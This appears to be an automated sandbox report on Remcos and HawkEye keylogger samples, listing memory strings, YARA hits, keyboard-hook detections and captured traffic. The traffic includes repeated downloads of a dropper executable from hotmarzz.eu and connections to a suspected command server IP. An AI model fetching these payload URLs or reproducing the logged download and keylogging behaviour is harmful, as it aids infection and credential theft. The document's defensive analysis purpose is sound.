                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
                    Source: remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                    Source: remcos.exe, 0000001F.00000003.749076522.000000000222E000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749491451.000000000222E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000003.680946266.0000000000805000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000003.682059201.00000000007CD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, bin.exe, 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, bin.exe, 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, bin.exe, 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, bin.exe, 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, bin.exe, 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                    Source: remcos.exe, 0000000D.00000003.753230553.00000000006E9000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmpString found in binary or memory: https://hotmarzz.eu/goods/Droppertodownloa.exe
                    Source: remcos.exe, 0000000D.00000003.753230553.00000000006E9000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmpString found in binary or memory: https://hotmarzz.eu/goods/Droppertodownloa.exej
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706505151.0000000000D4F000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706451948.0000000000D34000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000003.727292728.0000000002939000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000002.938043964.0000000002930000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000003.725936337.0000000002938000.00000004.00000010.sdmpString found in binary or memory: https://login.live.com
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
                    Source: remcos.exe, 0000001F.00000003.749076522.000000000222E000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749491451.000000000222E000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&
                    Source: remcos.exe, 0000001F.00000002.756957465.0000000002229000.00000004.00000001.sdmpString found in binary or memory: https://support.google.
                    Source: bin.exe, 00000003.00000002.944699333.00000000046E0000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.944739806.00000000046FD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845361008.00000000046FD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: remcos.exe, 0000001F.00000003.752021743.000000000222A000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                    Source: bin.exe, 00000003.00000002.944699333.00000000046E0000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.944739806.00000000046FD000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845361008.00000000046FD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                    Source: remcos.exe, 0000001F.00000002.756957465.0000000002229000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/p
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                    Source: remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                    Source: remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/search
                    Source: remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
                    Source: unknownDNS traffic detected: queries for: hotmarzz.eu
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00413468 Sleep,URLDownloadToFileW,4_2_00413468
                    Source: global trafficHTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: hotmarzz.eu
                    Source: global trafficHTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hotmarzz.euConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /goods/Droppertodownloa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hotmarzz.euConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Dec 2021 12:38:54 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 192Keep-Alive: timeout=2, max=90Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 51 43 b9 d9 42 1e 91 04 91 98 a5 b0 c4 ec 28 26 c8 e0 ee 22 fa f7 82 36 96 f7 31 e7 8e 58 c4 87 48 9d ca 04 76 6a 9f 43 59 6d f3 2c 02 7f 89 98 25 2a 45 8c 55 fc 4b 36 c1 0a 31 29 7c e9 89 c6 dd 5b 29 1a aa f5 24 dc cd b5 24 c3 55 08 05 3b 48 79 e8 b4 c0 9f e9 09 fc 96 c4 99 f5 7b be 5b cb bf ce a4 3c d1 4b d5 10 18 7a 0c 64 1d 69 a8 8e 39 e0 95 59 5b 8c 0d f7 3d 19 c7 9a c7 ae e5 3a a0 17 c1 58 5b e8 26 c6 65 66 00 77 e0 9a 9b 05 4b e6 49 26 10 d8 cf 9b df b5 89 3f 7f e9 7d 00 4f bd 26 5b e0 00 00 00 Data Ascii: M@E{bQCB(&"61XHvjCYm,%*EUK61)|[)$$U;Hy{[<Kzdi9Y[=:X[&efwKI&?}O&[
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Dec 2021 12:40:13 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTSet-Cookie: __cf_bm=ifc0FPkloiDp4Z1dpnjRqVqzqGMxVbTyrezZskC9KWs-1638880813-0-AXIdIT11xgQ5MMyVhDMcgQ9hAm7CPQjGNWgAvVdJNr0NNS/V7JbsqjReMXqFEa72rdjIhPL268dzLJd98EhxMqI=; path=/; expires=Tue, 07-Dec-21 13:10:13 GMT; domain=.whatismyipaddress.com; HttpOnlyServer: cloudflareCF-RAY: 6b9dd23c9d0368fb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: unknownHTTPS traffic detected: 81.88.52.165:443 -> 192.168.2.4:49739 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                    Installs a global keyboard hookShow sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\bin.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe
                    Contains functionality to log keystrokes (.Net Source)Show sources
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000003.675040396.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000001.674846942.0000000000403000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, type: MEMORY
